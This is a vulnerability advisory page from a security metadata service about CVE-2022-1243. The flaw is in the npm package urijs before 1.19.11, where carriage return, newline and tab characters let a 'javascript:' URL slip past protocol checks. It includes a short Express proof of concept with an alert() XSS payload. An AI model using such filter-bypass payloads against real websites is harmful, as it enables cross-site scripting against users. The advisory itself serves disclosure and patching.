Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS0zdmpmLTgyZmYtcDRyM804xw

High EPSS: 0.00318% (0.54035 Percentile) EPSS:
Permalink JSON

Incorrect protocol extraction via \r, \n and \t characters

Affected Packages Affected Versions Fixed Versions
npm:urijs
PURL: pkg:npm/urijs
< 1.19.11 1.19.11
1,163 Dependent packages
187,610 Dependent repositories
13,066,941 Downloads last month

Affected Version Ranges

All affected versions

1.16.1, 1.17.0, 1.17.1, 1.18.0, 1.18.1, 1.18.2, 1.18.3, 1.18.4, 1.18.5, 1.18.6, 1.18.7, 1.18.8, 1.18.9, 1.18.10, 1.18.11, 1.18.12, 1.19.0, 1.19.1, 1.19.2, 1.19.3, 1.19.4, 1.19.5, 1.19.6, 1.19.7, 1.19.8, 1.19.9, 1.19.10

All unaffected versions

1.19.11

\r, \n and \t characters in user-input URLs can potentially lead to incorrect protocol extraction when using npm package urijs prior to version 1.19.11.

This can lead to XSS when the module is used to prevent passing in malicious javascript: links into HTML or Javascript (see following example):

const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000

input = "ja\r\nvascript:alert(1)"
url = parse(input)

console.log(url)

app.get('/', (req, res) => {
 if (url.protocol !== "javascript:") {res.send("<iframe src=\'" + input + "\'>CLICK ME!</iframe>")}
})

app.listen(port, () => {
 console.log(`Example app listening on port ${port}`)
})
References:

Identifiers

GHSA-3vjf-82ff-p4r3

CVE-2022-1243

Risk

Severity

High

EPSS

EPSS Percentage: 0.00318

EPSS Percentile: 0.54035

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/medialize/uri.js

Date and time

Published

over 3 years ago

Updated

almost 2 years ago

API

JSON